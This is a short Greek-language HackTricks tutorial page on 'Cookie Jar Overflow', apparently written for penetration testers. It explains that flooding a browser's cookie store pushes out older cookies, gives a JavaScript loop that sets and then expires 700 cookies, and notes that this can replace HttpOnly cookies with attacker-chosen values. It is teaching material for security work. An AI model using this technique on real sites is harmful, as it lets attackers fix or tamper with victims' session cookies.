Greek - Ht
HackTricks Training Twitter Linkedin Sponsor

Cookie Jar Overflow

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Οι περιηγητές έχουν έναν περιορισμό στον αριθμό των cookies που μπορούν να αποθηκεύσουν για μια σελίδα. Έτσι, εάν για κάποιο λόγο χρειάζεστε να εξαφανίσετε ένα cookie, μπορείτε να υπερχειλίσετε τον αποθηκευτή cookie καθώς τα παλαιότερα θα διαγραφούν πριν από αυτό.

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Προσέξτε ότι τα cookies τρίτων μερών που αναφέρονται σε διαφορετικό τομέα δεν θα αντικατασταθούν.

Αυτή η επίθεση μπορεί επίσης να χρησιμοποιηθεί για να αντικαταστήσει τα cookies HttpOnly καθώς μπορείτε να τα διαγράψετε και στη συνέχεια να τα επαναφέρετε με την τιμή που θέλετε.

Ελέγξτε αυτό στο αυτό το άρθρο με ένα εργαστήριο.

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

PreviousCookie TossingNextCookie Bomb

Last updated